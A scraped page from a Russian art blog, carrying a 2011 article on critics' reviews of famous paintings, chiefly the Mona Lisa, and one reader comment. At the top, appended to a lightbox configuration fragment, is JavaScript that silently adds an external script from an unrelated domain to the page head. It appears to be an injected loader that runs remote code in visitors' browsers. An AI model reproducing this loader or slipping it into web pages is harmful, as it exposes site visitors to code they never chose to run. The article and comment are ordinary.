, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Отзывы критиков

Автор: Юлия | 22 Апр 2011

Картины с многолетней историей собрали вокруг себя отзывы критиков уже нескольких поколений, начиная от современников их создателей и заканчивая авторами нашего времени. Ознакомимся с отзывами критиков, их эволюцией, значением и функциями на примере трех знаменитых шедевров: "Мона Лиза" Леонардо да Винчи, "Черный квадрат" Каземира Малевича и "Авиньонские девицы" Пабло Пикассо.

Бесспорно выдающаяся работа Леонардо да Винчи за пять столетий, прошедших с момента ее создания, получила множество разных оценок. Большинство отзывов критиков провозглашали "Мону Лизу" идеалом женственности, восхищались ее неповторимой улыбкой и одухотворенным обликом. Однако находились и такие, кто говорил о знаменитом портрете в негативном ключе. "Это не улыбка, но хищная физиономия с холодными глазами и отчетливым знанием беспомощности той жертвы, которой Джоконда хочет овладеть и в которой, кроме слабости, она рассчитывает еще на бессилие перед овладевшим ею скверным чувством", – такой вывод сделал философ Алексей Лосев.

На примере "Моны Лизы" мы видим, что отзывы критиков, хоть и не влияют в значительной мере на общественное мнение, отражают всю гамму человеческого восприятия. И если Вы не согласны с одним критиком, всегда найдется другой, который его оспорит и представит иное мнение. Идет речь о малоизвестной работе или же о признанном шедевре, абсолютной истины в живописи никогда не было и не будет. Спорные, неоднозначные, субъективные отзывы критиков – яркое тому подтверждение.

Чем еще полезны отзывы критиков, почему их стоит читать, знакомясь с картиной, я расскажу во второй части статьи на примере шедевров Пикассо и Малевича.

Темы: Критика | 1 отзыв »

Один отзыв на “Отзывы критиков”

  1. Геннадий пишет:
    29 Апр 2011 в 22:30

    Никогда не интересовало мнение критиков. Только собственное мнение и отношение, остальное условности. Иначе, нравится или не нравится. Вот и все

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress